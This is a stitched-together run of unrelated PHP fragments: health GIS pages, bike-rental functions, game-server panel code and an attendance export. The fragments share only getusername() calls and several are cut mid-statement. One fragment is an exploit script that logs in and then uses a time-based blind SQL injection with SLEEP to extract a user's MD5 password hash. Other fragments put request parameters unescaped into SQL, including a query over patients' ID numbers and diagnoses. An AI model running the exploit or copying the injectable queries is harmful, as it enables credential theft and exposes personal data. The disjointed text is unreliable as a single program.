$pdf->displayText('<b><i>' . __('Description') . ' :</i></b>', $this->fields['comment']); $pdf->displaySpace(); }
?> <div class="pull-right action-buttons"> <a id="<?php echo $comment['comment_id']; ?> " class="editcomment"><span class="glyphicon glyphicon-pencil"></span></a> <a id="<?php echo $comment['comment_id']; ?> " class="deletecomment"><span class="glyphicon glyphicon-trash"></span></a> </div> <?php } ?> <span class="date sub-text"><?php echo $comment['created_date'] . ' By ' . getusername($comment['user_id']); ?> </span> </div> </li> <?php } ?> </ul> <div class="form-inline" role="form"> <div class="form-group"> <input class="form-control" id ="txtnewcomment-<?php echo $task['item_id']; ?>
<?php include "../includes/config.local.php"; $project = "GIS for JHCIS"; $usergis = $_SESSION[username]; $cuser = getusername($_SESSION[username]); $cfuser = getuserfname($_SESSION[username]); $clevel = $_SESSION[level]; $cposition = $_SESSION[position]; $titleweb = "GIS for JHCIS v3.0.0"; // if ($_SESSION[username]) { $headweb2 = $cuser; $lmenu = "menutop" . $clevel . ".php"; } else { $lmenu = "menutop2.php"; $headweb2 = "บุคคลทั่วไป"; } $sqloff = "SELECT chospital.hosname,chospital.hoscode \n\t\t\t\tFROM office\n\t\t\t\tInner Join chospital ON office.offid = chospital.hoscode\n\t\t\t\tWHERE chospital.hoscode <> '0000x'"; $resoff = mysql_query($sqloff); $rowoff = mysql_fetch_array($resoff); $hospitalname = $rowoff[hosname]; $hospitalcode = $rowoff[hoscode]; $offname = "" . $rowoff[hosname] . "(" . $rowoff[hoscode] . ")"; $version = "version v3.0.0 beta"; $headweb = "<table width='100%' border='0' cellspacing='0' cellpadding='0'><tr><td><img src='images/logo.jpg'></td><td></td><td><div align='right'><strong>{$offname}</strong><br>{$version}</div></td></tr></table>"; $todays = date("Y-m-d"); $dtimenow = date("Y-m-d H:i:s"); $ThaiMonth = array("มกราคม", "กุมภาพันธ์", "มีนาคม", "เมษายน", "พฤษภาคม", "มิถุนายน", "กรกฎาคม", "สิงหาคม", "กันยายน", "ตุลาคม", "พฤศจิกายน", "ธันวาคม"); $ThaiSubMonth = array("ม.ค.", "ก.พ.", "มี.ค.", "เม.ย.", "พ.ค.", "มิ.ย.", "ก.ค.", "ส.ค.", "ก.ย.", "ต.ค.", "พ.ย.", "ธ.ค."); /*ฟังก์ชั่นตัดสตริงแปลงวันที่เป็นไทยแบบสั้น ตัวอย่างรูปแบบสตริงนำเข้า 2001-07-16 23:53:11*/ function SortThaiDate($txt)
function rent($userId, $bike, $force = FALSE) { global $db, $forcestack, $watches, $credit; $stacktopbike = FALSE; $bikeNum = $bike; $requiredcredit = $credit["min"] + $credit["rent"] + $credit["longrental"]; $creditcheck = checkrequiredcredit($userId); if ($creditcheck === FALSE) { response(_('You are below required credit') . " " . $requiredcredit . $credit["currency"] . ". " . _('Please, recharge your credit.'), ERROR); } checktoomany(0, $userId); $result = $db->query("SELECT count(*) as countRented FROM bikes where currentUser={$userId}"); $row = $result->fetch_assoc(); $countRented = $row["countRented"]; $result = $db->query("SELECT userLimit FROM limits where userId={$userId}"); $row = $result->fetch_assoc(); $limit = $row["userLimit"]; if ($countRented >= $limit) { if ($limit == 0) { response(_('You can not rent any bikes. Contact the admins to lift the ban.'), ERROR); } elseif ($limit == 1) { response(_('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once') . ".", ERROR); } else { response(_('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once and you have already rented') . " " . $limit . ".", ERROR); } } if ($forcestack or $watches["stack"]) { $result = $db->query("SELECT currentStand FROM bikes WHERE bikeNum='{$bike}'"); $row = $result->fetch_assoc(); $standid = $row["currentStand"]; $stacktopbike = checktopofstack($standid); if ($watches["stack"] and $stacktopbike != $bike) { $result = $db->query("SELECT standName FROM stands WHERE standId='{$standid}'"); $row = $result->fetch_assoc(); $stand = $row["standName"]; $user = getusername($userId); notifyAdmins(_('Bike') . " " . $bike . " " . _('rented out of stack by') . " " . $user . ". " . $stacktopbike . " " . _('was on the top of the stack at') . " " . $stand . ".", ERROR); } if ($forcestack and $stacktopbike != $bike) { response(_('Bike') . " " . $bike . " " . _('is not rentable now, you have to rent bike') . " " . $stacktopbike . " " . _('from this stand') . ".", ERROR); } } $result = $db->query("SELECT currentUser,currentCode FROM bikes WHERE bikeNum={$bikeNum}"); $row = $result->fetch_assoc(); $currentCode = sprintf("%04d", $row["currentCode"]); $currentUser = $row["currentUser"]; $result = $db->query("SELECT note FROM notes WHERE bikeNum='{$bikeNum}' ORDER BY time DESC"); $note = ""; while ($row = $result->fetch_assoc()) { $note .= $row["note"] . "; "; } $note = substr($note, 0, strlen($note) - 2); // remove last two chars - comma and space $newCode = sprintf("%04d", rand(100, 9900)); //do not create a code with more than one leading zero or more than two leading 9s (kind of unusual/unsafe). if ($currentUser == $userId) { response(_('You have already rented the bike') . ' ' . $bikeNum . '. ' . _('Code is') . ' <span class="label label-primary">' . $currentCode . '</span>. ' . _('Return bike by scanning QR code on a stand') . '.', ERROR); return; } if ($currentUser != 0) { response(_('Bike') . " " . $bikeNum . " " . _('is already rented') . ".", ERROR); return; } $message = '<h3>' . _('Bike') . ' ' . $bikeNum . ': <span class="label label-primary">' . _('Open with code') . ' ' . $currentCode . '.</span></h3>' . _('Change code immediately to') . ' <span class="label label-default">' . $newCode . '</span><br />' . _('(open, rotate metal part, set new code, rotate metal part back)') . '.'; if ($note) { $message .= "<br />" . _('Reported issue:') . " <em>" . $note . "</em>"; } $result = $db->query("UPDATE bikes SET currentUser={$userId},currentCode={$newCode},currentStand=NULL WHERE bikeNum={$bikeNum}"); $result = $db->query("INSERT INTO history SET userId={$userId},bikeNum={$bikeNum},action='RENT',parameter={$newCode}"); response($message); }
function rent($number, $bike, $force = FALSE) { global $db, $forcestack, $watches, $credit; $stacktopbike = FALSE; $userId = getUser($number); $bikeNum = intval($bike); $requiredcredit = $credit["min"] + $credit["rent"] + $credit["longrental"]; if ($force == FALSE) { $creditcheck = checkrequiredcredit($userId); if ($creditcheck === FALSE) { $result = $db->query("SELECT credit FROM credit WHERE userId={$userId}"); $row = $result->fetch_assoc(); sendSMS($number, _('Please, recharge your credit:') . " " . $row["credit"] . $credit["currency"] . ". " . _('Credit required:') . " " . $requiredcredit . $credit["currency"] . "."); return; } checktoomany(0, $userId); $result = $db->query("SELECT count(*) as countRented FROM bikes where currentUser={$userId}"); $row = $result->fetch_assoc(); $countRented = $row["countRented"]; $result = $db->query("SELECT userLimit FROM limits where userId={$userId}"); $row = $result->fetch_assoc(); $limit = $row["userLimit"]; if ($countRented >= $limit) { if ($limit == 0) { sendSMS($number, _('You can not rent any bikes. Contact the admins to lift the ban.')); } elseif ($limit == 1) { sendSMS($number, _('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once') . "."); } else { sendSMS($number, _('You can only rent') . " " . sprintf(ngettext('%d bike', '%d bikes', $limit), $limit) . " " . _('at once') . " " . _('and you have already rented') . " " . $limit . "."); } return; } if ($forcestack or $watches["stack"]) { $result = $db->query("SELECT currentStand FROM bikes WHERE bikeNum='{$bike}'"); $row = $result->fetch_assoc(); $standid = $row["currentStand"]; $stacktopbike = checktopofstack($standid); if ($watches["stack"] and $stacktopbike != $bike) { $result = $db->query("SELECT standName FROM stands WHERE standId='{$standid}'"); $row = $result->fetch_assoc(); $stand = $row["standName"]; $user = getusername($userId); notifyAdmins(_('Bike') . " " . $bike . " " . _('rented out of stack by') . " " . $user . ". " . $stacktopbike . " " . _('was on the top of the stack at') . " " . $stand . ".", ERROR); } if ($forcestack and $stacktopbike != $bikeNum) { response(_('Bike') . " " . $bike . " " . _('is not rentable now, you have to rent bike') . " " . $stacktopbike . " " . _('from this stand') . ".", ERROR); return; } } } $result = $db->query("SELECT currentUser,currentCode FROM bikes WHERE bikeNum={$bikeNum}"); if ($result->num_rows != 1) { sendSMS($number, "Bike {$bikeNum} does not exist."); return; } $row = $result->fetch_assoc(); $currentCode = sprintf("%04d", $row["currentCode"]); $currentUser = $row["currentUser"]; $result = $db->query("SELECT note FROM notes WHERE bikeNum={$bikeNum} AND deleted IS NULL ORDER BY time DESC LIMIT 1"); $row = $result->fetch_assoc(); $note = $row["note"]; if ($currentUser) { $result = $db->query("SELECT number FROM users WHERE userId={$currentUser}"); $row = $result->fetch_assoc(); $currentUserNumber = $row["number"]; } $newCode = sprintf("%04d", rand(100, 9900)); //do not create a code with more than one leading zero or more than two leading 9s (kind of unusual/unsafe). if ($force == FALSE) { if ($currentUser == $userId) { sendSMS($number, _('You have already rented the bike') . " " . $bikeNum . ". " . _('Code is') . " " . $currentCode . ". " . _('Return bike with command:') . " RETURN " . _('bikenumber') . " " . _('standname') . "."); return; } if ($currentUser != 0) { sendSMS($number, _('Bike') . " " . $bikeNum . " " . _('is already rented') . "."); return; } } $message = _('Bike') . " " . $bikeNum . ": " . _('Open with code') . " " . $currentCode . ". " . _('Change code immediately to') . " " . $newCode . " " . _('(open,rotate metal part,set new code,rotate metal part back)') . "."; if ($note) { $message .= "(" . _('bike note') . ":" . $note . ")"; } sendSMS($number, $message); $result = $db->query("UPDATE bikes SET currentUser={$userId},currentCode={$newCode},currentStand=NULL WHERE bikeNum={$bikeNum}"); if ($force == FALSE) { $result = $db->query("INSERT INTO history SET userId={$userId},bikeNum={$bikeNum},action='RENT',parameter={$newCode}"); } else { $result = $db->query("INSERT INTO history SET userId={$userId},bikeNum={$bikeNum},action='FORCERENT',parameter={$newCode}"); if ($currentUser) { sendSMS($currentUserNumber, _('System override') . ": " . _('Your rented bike') . " " . $bikeNum . " " . _('has been rented by admin') . "."); } } }
function checkDNS($dns, $id = null, $user_id = null, $type = '') { global $sql, $reseller_id; if ($type == 'server') { $query = $sql->prepare("SELECT `masterserver` FROM `voice_server` WHERE `id`=? AND `resellerid`=? LIMIT 1"); $query->execute(array($id, $reseller_id)); $masterID = $query->fetchColumn(); $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dns`=? AND `resellerID`=? LIMIT 1"); $query->execute(array($dns, $reseller_id)); $query2 = $sql->prepare("SELECT `masterserver` FROM `voice_server` WHERE `id`!=? AND `dns`=? AND `resellerid`=? LIMIT 1"); $query2->execute(array($id, $dns, $reseller_id)); } else { if ($type == 'dns') { $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dnsID`!=? AND `resellerID`=? LIMIT 1"); $query->execute(array($id, $reseller_id)); $masterID = $query->fetchColumn(); $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dnsID`!=? AND `dns`=? AND `resellerID`=? LIMIT 1"); $query->execute(array($id, $dns, $reseller_id)); $query2 = $sql->prepare("SELECT `id` FROM `voice_server` WHERE `dns`=? AND `resellerid`=? LIMIT 1"); $query2->execute(array($dns, $reseller_id)); } else { $query = $sql->prepare("SELECT `tsdnsID` FROM `voice_dns` WHERE `dns`=? AND `resellerID`=? LIMIT 1"); $query->execute(array($dns, $reseller_id)); $query2 = $sql->prepare("SELECT `id` FROM `voice_server` WHERE `dns`=? AND `resellerid`=? LIMIT 1"); $query2->execute(array($dns, $reseller_id)); } } if ($query->rowCount() > 0 or $query2->rowCount() > 0) { return false; } if ($user_id != null) { $serverdnsArray = array(); $query = $sql->prepare("SELECT `id`,`defaultdns`,`externalDefaultDNS`,`tsdnsServerID` FROM `voice_masterserver` WHERE `resellerid`=?"); $query->execute(array($reseller_id)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { if ($row['externalDefaultDNS'] == 'N') { unset($temp); if ($type == 'server' and $id != null and $row['id'] == $masterID) { $defaultdns = strtolower($id . '.' . $row['defaultdns']); $partCount = count(explode('.', $defaultdns)); } $ex = explode('.', $row['defaultdns']); $i = count($ex) - 1; while ($i >= 0) { $serverdnsArray[] = isset($temp) ? $ex[$i] . '.' . $temp : $ex[$i]; $i--; } } else { if ($type == 'server' and $row['externalDefaultDNS'] == 'Y' and $id != null and $row['id'] == $masterID) { $tsdnsServerID = $row['tsdnsServerID']; } } } $query = $sql->prepare("SELECT `id`,`defaultdns` FROM `voice_tsdns` WHERE `resellerid`=?"); $query->execute(array($reseller_id)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { unset($temp); if (isset($tsdnsServerID) and $id != null and $row['id'] == $tsdnsServerID or $type == 'dns' and $id != null and $row['id'] == $masterID) { $defaultdns = strtolower($id . '-' . getusername($user_id) . '.' . $row['defaultdns']); $partCount = count(explode('.', $defaultdns)); } $ex = explode('.', $row['defaultdns']); $i = count($ex) - 1; while ($i >= 0) { $serverdnsArray[] = isset($temp) ? $ex[$i] . '.' . $temp : $ex[$i]; $i--; } } if (isset($defaultdns) and $dns == $defaultdns) { return true; } $ex = explode('.', $dns); $dnsPartCount = count($ex); $first = $ex[0]; if (isset($partCount) and $partCount == $dnsPartCount and isid($first, 10) and ($type == 'dns' or $type == 'server' and $first != $id)) { return false; } $ex = explode('-', $first); if ($type == 'dns' and isset($partCount) and $partCount == $dnsPartCount and $ex[0] != $id) { return false; } $serverdnsArray = array_unique($serverdnsArray); if ((isset($defaultdns) and $dns != $defaultdns or !isset($defaultdns)) and in_array($dns, $serverdnsArray)) { return false; } } return true; }
} // No need to check if we can connect if the user messed up the input fields anyway if (count($errors) == 0) { $connection = new TS3($masterServerData['ssh2ip'], $masterServerData['queryport'], 'serveradmin', $masterServerData['decryptedquerypassword']); $errorcode = $connection->errorcode; if (strpos($errorcode, 'error id=0') === false) { $errors['ts3Connect'] = $errorcode; } } // Submitted values are OK if (count($errors) == 0) { // Make the inserts or updates define the log entry and get the affected rows from insert if ($ui->st('action', 'post') == 'ad') { $localServerID = $connection->AddServer($slots, $ip, $port, $initialpassword, $name, array($forcewelcome, $welcome), $max_download_total_bandwidth, $max_upload_total_bandwidth, array($forcebanner, $hostbanner_url), $hostbanner_gfx_url, array($forcebutton, $hostbutton_url), $hostbutton_gfx_url, $hostbutton_tooltip); if (isid($localServerID, 255)) { $username = strtolower(getusername($userID)); $query = $sql->prepare("INSERT INTO `voice_server` (`active`,`backup`,`lendserver`,`userid`,`masterserver`,`ip`,`port`,`slots`,`initialpassword`,`password`,`forcebanner`,`forcebutton`,`forceservertag`,`forcewelcome`,`max_download_total_bandwidth`,`max_upload_total_bandwidth`,`localserverid`,`dns`,`maxtraffic`,`serverCreated`,`flexSlots`,`flexSlotsFree`,`flexSlotsPercent`,`autoRestart`,`externalID`,`resellerid`) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,NOW(),?,?,?,?,?,?)"); $query->execute(array($active, $backup, $lendserver, $userID, $rootID, $ip, $port, $slots, $initialpassword, $password, $forcebanner, $forcebutton, $forceservertag, $forcewelcome, $max_download_total_bandwidth, $max_upload_total_bandwidth, $localServerID, $dns, $maxtraffic, $flexSlots, $flexSlotsFree, $flexSlotsPercent, $autoRestart, $externalID, $resellerLockupID)); $rowCount = $query->rowCount(); $id = $sql->lastInsertId(); } else { $ts3ErrorCode = 'TS errorcode: ' . $localServerID; } $loguseraction = '%add% %voserver% ' . $ip . ':' . $port; } else { if ($ui->st('action', 'post') == 'md' and $id) { $query = $sql->prepare("UPDATE `voice_server` SET `active`=?,`backup`=?,`lendserver`=?,`ip`=?,`port`=?,`slots`=?,`password`=?,`forcebanner`=?,`forcebutton`=?,`forceservertag`=?,`forcewelcome`=?,`max_download_total_bandwidth`=?,`max_upload_total_bandwidth`=?,`dns`=?,`flexSlots`=?,`flexSlotsFree`=?,`flexSlotsPercent`=?,`maxtraffic`=?,`autoRestart`=?,`externalID`=? WHERE `id`=? AND `resellerid`=? LIMIT 1"); $query->execute(array($active, $backup, $lendserver, $ip, $port, $slots, $password, $forcebanner, $forcebutton, $forceservertag, $forcewelcome, $max_download_total_bandwidth, $max_upload_total_bandwidth, $dns, $flexSlots, $flexSlotsFree, $flexSlotsPercent, $maxtraffic, $autoRestart, $externalID, $id, $resellerLockupID)); $rowCount = $query->rowCount(); $return = $connection->ModServer($localServerID, $slots, $ip, $port, $initialpassword, $name, $welcome, $max_download_total_bandwidth, $max_upload_total_bandwidth, $hostbanner_url, $hostbanner_gfx_url, $hostbutton_url, $hostbutton_gfx_url, $hostbutton_tooltip); if (isset($return[0]['msg']) and $return[0]['msg'] == 'ok') {
$pserver = 'server/'; } else { if ($protected == 'Y' and $pallowed == 'Y') { $ftpshorten = $row['shorten']; $username = $username . '-p'; $ftppass = $row['dpftppass']; $pserver = ''; } else { $ftpshorten = $row['shorten']; $pserver = 'server/'; } } } $query = $sql->prepare("SELECT g.`protected`,g.`homeLabel`,t.`configs`,s.`id` FROM `gsswitch` g INNER JOIN `serverlist` s ON g.`serverid`=s.`id` INNER JOIN `servertypes` t ON s.`servertype`=t.`id` WHERE g.`id`=? AND g.`userid`=? AND g.`resellerid`=? LIMIT 1"); $query->execute(array($id, $user_id, $resellerLockupID)); $customer = getusername($user_id); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $serverID = $row['id']; $protected = $row['protected']; $homeLabel = $row['homeLabel']; $config_rows = explode("\r\n", $row['configs']); foreach ($config_rows as $configline) { $data_explode = explode(" ", $configline); $permission = isset($data_explode[1]) ? $data_explode[1] : 'full'; if ($data_explode[0] != '') { $configs[] = array('permission' => $permission, 'line' => $data_explode[0]); $configCheck[] = $data_explode[0]; } } } $query = $sql->prepare("SELECT a.`configs`,a.`paddon` FROM `addons_installed` i INNER JOIN `addons` a ON i.`addonid`=a.`id` WHERE i.`serverid`=? AND i.`userid`=? AND i.`resellerid`=?");
} } if ($ui->w('action', 4, 'post') and !token(true)) { $template_file = $spracheResponse->token; } else { if ($ui->st('d', 'get') == 'md' and $ui->id('id', 10, 'get') and (!isset($_SESSION['sID']) or in_array($ui->id('id', 10, 'get'), $substituteAccess['vd']))) { $id = $ui->id('id', 10, 'get'); if (!$ui->smallletters('action', 2, 'post')) { $query = $sql->prepare("SELECT d.`dnsID`,d.`dns`,d.`ip`,d.`port`,t.`defaultdns`,CASE WHEN t.`connect_ip_only`='Y' THEN `external_ip` ELSE `ssh2ip` END AS `dns_ip` FROM `voice_dns` d INNER JOIN `voice_tsdns` t ON d.`tsdnsID`=t.`id` WHERE d.`active`='Y' AND d.`dnsID`=? AND d.`resellerID`=? LIMIT 1"); $query->execute(array($id, $reseller_id)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $dnsIp = $row['dns_ip']; $dns = $row['dns']; $ip = $row['ip']; $port = $row['port']; $defaultdns = strtolower($row['dnsID'] . '-' . getusername($user_id) . $row['defaultdns']); } $template_file = isset($dns) ? 'userpanel_voiceserver_dns_md.tpl' : 'userpanel_404.tpl'; } else { if ($ui->smallletters('action', 2, 'post') == 'md') { $query = $sql->prepare("SELECT d.`tsdnsID`,d.`dnsID`,d.`dns`,d.`ip`,d.`port`,t.`defaultdns` FROM `voice_dns` d INNER JOIN `voice_tsdns` t ON d.`tsdnsID`=t.`id` WHERE d.`active`='Y' AND d.`dnsID`=? AND d.`resellerID`=? LIMIT 1"); $query->execute(array($id, $reseller_id)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $tsdnsID = $row['tsdnsID']; $olddns = $row['dns']; $oldip = $row['ip']; $oldport = $row['port']; } if (isset($olddns)) { $error = array(); if ($ui->ip('ip', 'post')) {
} } if ($argv[$i] == "-t") { if (isset($argv[$i + 1]) && !in_array($argv[$i + 1], $opt)) { $prefix = $argv[++$i]; } } } if (!login()) { print "\n[-] Trying to register with username '{$username}' and password '{$password}'\n"; register(); if (!login()) { die("\n[-] Login failed!\n"); } } $user = getusername($uid); print "\n[-] Username: {$user}"; $hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102); $index = 1; $md5 = ""; print "\n[-] MD5 Hash: "; while (!strpos($md5, chr(0))) { for ($i = 0, $n = count($hash); $i <= $n; $i++) { if ($i == $n) { die("\n\n[-] Exploit failed...\n"); } $sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#"; if (getdelay($sql) >= $count * 1000) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break;
$query = $sql->prepare("UPDATE `tickets` SET `state`='R' WHERE `id`=? AND `resellerid`=? AND `state`='D' LIMIT 1"); $query->execute(array($id, $resellerid)); $template_file = $query->rowCount() > 0 ? $spracheResponse->table_add : 'admin_404.tpl'; } else { if (!$ui->smallletters('action', 2, 'post') or $ui->smallletters('action', 2, 'get') == 'md') { $table = array(); $default_language = $rSA['language']; $query = $sql->prepare("SELECT * FROM `tickets` WHERE `id`=? AND `resellerid`=? LIMIT 1"); $query2 = $sql->prepare("SELECT * FROM `tickets_text` WHERE `ticketID`=? AND `resellerID`=? ORDER BY `writeDate`"); $query3 = $sql->prepare("SELECT `text` FROM `translations` WHERE `type`='ti' AND `lang`=? AND `transID`=? AND `resellerID`=? LIMIT 1"); $query4 = $sql->prepare("SELECT `topic` FROM `ticket_topics` WHERE `id`=? AND `resellerid`=? LIMIT 1"); $query->execute(array($id, $resellerid)); while ($row = $query->fetch(PDO::FETCH_ASSOC)) { $query2->execute(array($id, $resellerid)); while ($row2 = $query2->fetch(PDO::FETCH_ASSOC)) { $table[] = array('writedate' => $user_language == 'de' ? date('d.m.Y', strtotime($row2['writeDate'])) : date('Y-m-d', strtotime($row2['writeDate'])), 'writeTime' => date('H:i:s', strtotime($row2['writeDate'])), 'ticket' => nl2br(htmlspecialchars(stripslashes($row2['message']))), 'writer' => getusername($row2['userID'])); } if ($row['userPriority'] == 1) { $priority = $sprache->priority_low; } else { if ($row['userPriority'] == 2) { $priority = $sprache->priority_medium; } else { if ($row['userPriority'] == 3) { $priority = $sprache->priority_high; } else { if ($row['userPriority'] == 4) { $priority = $sprache->priority_very_high; } else { $priority = $sprache->priority_critical; }
include_once "mod.attendance.php"; include_once "ctrl.checklogin.php"; include_once "ctrl.calendar.php"; include_once "ctrl.attendance.php"; mysql_query("set character_set_client='utf8'"); mysql_query("set character_set_results='utf8'"); mysql_query("set collation_connection='utf8_general_ci'"); /** Error reporting */ error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE); //$userid = (!isset($_GET['userid']) || $_GET['userid'] == "")?1:$_GET['userid']; $userid = $_GET['uid']; $todaydate = explode("-", date("Y-n-j")); $getCurrentMonth = getCurrentMonth($todaydate, $userid, $db); $getname = getusername($userid, $db); foreach ($getname as $result) { $fname = $result['user_name']; } if (PHP_SAPI == 'cli') { die('This example should only be run from a Web Browser'); } /** Include PHPExcel */ require_once 'Classes/PHPExcel.php'; // Create new PHPExcel object $objPHPExcel = new PHPExcel(); // Set document properties $objPHPExcel->getProperties()->setCreator("Rubbersoul")->setLastModifiedBy("Maarten Balliauw")->setTitle("Office 2007 XLSX Test Document")->setSubject("Office 2007 XLSX Test Document")->setDescription("Test document for Office 2007 XLSX, generated using PHP classes.")->setKeywords("office 2007 openxml php")->setCategory("Test result file"); $hrow = 1; $objPHPExcel->setActiveSheetIndex(0)->setCellValue('A' . $hrow, '日付')->setCellValue('B' . $hrow, '曜日')->setCellValue('C' . $hrow, '出社時間')->setCellValue('D' . $hrow, '遅刻')->setCellValue('E' . $hrow, '退社時間')->setCellValue('F' . $hrow, '早退')->setCellValue('G' . $hrow, '作業時間')->setCellValue('H' . $hrow, '残業時間')->setCellValue('I' . $hrow, '統計時間'); foreach ($getCurrentMonth as $row) {
} else { $chkston = "เฉพาะOPD (ไม่นับรหัส Z)"; } $str = retdaterangstr($_GET[str]); $sto = retdaterangsto($_GET[str]); $strx = retDatets($str); $stox = retDatets($sto); $sql = "SELECT \nperson.pid,\nperson.idcard,\nCONVERT(concat(ifnull(c.titlename,ifnull(person.prename,'ไม่ระบุ') ),person.fname,' ' ,person.lname) using utf8) as pname,\nhouse.hno,\nhouse.villcode,\nhouse.xgis,\nhouse.ygis,\nv.visitno,\nv.visitdate,\nv.symptoms,\nv.vitalcheck,\nGROUP_CONCAT(visitdiag.diagcode) as gdiagcode,\nGROUP_CONCAT(cdisease.diseasename) as gdiagname,\nGROUP_CONCAT(cdisease.diseasenamethai) as gdiagnamethai,\nv.username\nFROM\nvillage\nINNER JOIN house ON village.pcucode = house.pcucode AND village.villcode = house.villcode\nINNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode\nleft join ctitle c on c.titlecode = person.prename\nINNER JOIN visit v ON person.pcucodeperson = v.pcucodeperson AND person.pid = v.pid\nINNER JOIN visitdiag ON v.pcucode = visitdiag.pcucode AND v.visitno = visitdiag.visitno\ninner join cdisease on visitdiag.diagcode = cdisease.diseasecode\nWHERE v.visitdate between '{$str}' and '{$sto}' and (v.flagservice <'04' OR v.flagservice is null OR length(trim(v.flagservice))=0 ) {$wvill} {$chksto}\ngroup by v.pcucode,v.visitno\norder by v.visitdate desc, person.fname"; $result = mysql_query($sql); $txt = '<p align=\'center\'><b>รายชื่อผู้รับบริการ'; $txt .= "<p div align='center' class='text-danger'>ข้อมูลระหว่างวันที่ {$strx} ถึง {$stox} </p></div></b></p><b>{$hosp}</b><br>{$chkston}<table width='99%' border='0' cellspacing='1' cellpadding='1' class='table table-striped table-hover table-bordered'>\n <tr>\n <th width='4%' scope='col'><div align='center'>ลำดับ</div></th>\n\t<th width='4%' scope='col'><div align='center'>HN</div></th>\n\t<th width='9%' scope='col'><div align='center'>เลขบัตรประชาชน</div></th>\n <th width='12%' scope='col'><div align='center'>ชื่อ - สกุล</div></th>\n\t<th width='6%' scope='col'><div align='center'>ที่อยู่</div></th>\n\t<th width='8%' scope='col'><div align='center'>วันที่ใช้บริการ</div></th>\n\t<th width='6%' scope='col'><div align='center'>รหัสโรค</div></th>\n <th width='20%' scope='col'><div align='center'>ชื่อโรค</div></th>\n\t<th width='20%' scope='col'><div align='center'>ชื่อโรคภาษาไทย</div></th>\n <th width='8%' scope='col'><div align='center'>ผู้ให้บริการ</div></th>\n </tr>"; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = getMooVillage($row[villcode]); $sick = retDatets($row[visitdate]); $userservice = getusername($row[username]); ++$x; if ($x % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$x}</div></td>\n\t<td>{$row['pid']}</td>\n\t<td>{$row['idcard']}</td>\n <td>{$row['pname']}</td>\n\t<td>{$row['hno']} หมู่ที่ {$moo}</td>\n <td><div align='center'>{$sick}</div></td>\n <td>{$row['gdiagcode']}</td>\n\t<td>{$row['gdiagname']}</td>\n\t<td>{$row['gdiagnamethai']}</td>\n <td>{$userservice}</td>\n </tr>"; } $txt .= "</table><br>"; echo $txt; } else { header("Location: ../main/login.php"); } ?>
* Siehe die GNU General Public License fuer weitere Details. * * Sie sollten eine Kopie der GNU General Public License zusammen mit diesem * Programm erhalten haben. Wenn nicht, siehe <http://www.gnu.org/licenses/>. */ if (!isset($user_id) or $main != 1 or isset($user_id) and !$pa['voiceserver']) { header('Location: userpanel.php'); die('No Access'); } include EASYWIDIR . '/stuff/keyphrasefile.php'; include EASYWIDIR . '/stuff/methods/class_ts3.php'; include EASYWIDIR . '/stuff/methods/functions_ssh_exec.php'; include EASYWIDIR . '/stuff/methods/functions_ts3.php'; $sprache = getlanguagefile('voice', $user_language, $reseller_id); $loguserid = $user_id; $logusername = getusername($user_id); $logusertype = 'user'; $logreseller = 0; if (isset($admin_id)) { $logsubuser = $admin_id; } else { if (isset($subuser_id)) { $logsubuser = $subuser_id; } else { $logsubuser = 0; } } if ($ui->st('d', 'get') == 'bu' and $ui->id('id', 10, 'get') and (!isset($_SESSION['sID']) or in_array($ui->id('id', 10, 'get'), $substituteAccess['vo']))) { $id = $ui->id('id', 10, 'get'); $query = $sql->prepare("SELECT v.`id`,v.`ip`,v.`port`,v.`dns`,v.`localserverid`,v.`masterserver`,m.`type`,m.`queryport`,AES_DECRYPT(m.`querypassword`,:aeskey) AS `decryptedquerypassword`,m.`rootid`,m.`addedby`,m.`ssh2ip`,m.`type`,m.`usedns`,m.`publickey`,m.`ssh2ip`,AES_DECRYPT(m.`ssh2port`,:aeskey) AS `decryptedssh2port`,AES_DECRYPT(m.`ssh2user`,:aeskey) AS `decryptedssh2user`,AES_DECRYPT(m.`ssh2password`,:aeskey) AS `decryptedssh2password`,m.`serverdir`,m.`keyname`,m.`notified` FROM `voice_server` v LEFT JOIN `voice_masterserver` m ON v.`masterserver`=m.`id` WHERE v.`active`='Y' AND m.`active`='Y' AND v.`backup`='Y' AND v.`id`=:server_id AND v.`userid`=:user_id AND v.`resellerid`=:reseller_id LIMIT 1"); $query->execute(array(':aeskey' => $aeskey, ':server_id' => $id, ':user_id' => $user_id, ':reseller_id' => $reseller_id));
<?php session_start(); include "../includes/conndb.php"; include "../includes/config.inc.php"; if ($_GET[villcode]) { $villcode = $_GET[villcode]; $user = $_GET[username]; $userperson = getusername($user); $sql = "UPDATE house SET house.usernamedoc = '{$user}' WHERE house.villcode ='{$villcode}'"; $result = mysql_query($sql); $sql = "UPDATE house Inner Join person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode SET person.privatedoc = '{$userperson}' WHERE house.villcode ='{$villcode}'"; $result = mysql_query($sql); echo "<div align='center' class='text text-success'>กำหนดหมู่บ้านรับผิดชอบเรียบร้อยแล้ว</div>"; $sql = "SELECT\nCONCAT(convert(village.villno using utf8),' ',`village`.`villname`) AS address,\nconcat(ctitle.titlename,`user`.fname,' ',`user`.lname) as pname\nFROM\nhouse\nInner Join `user` ON house.pcucode = `user`.pcucode AND house.usernamedoc = `user`.username\nInner Join village ON village.villcode = 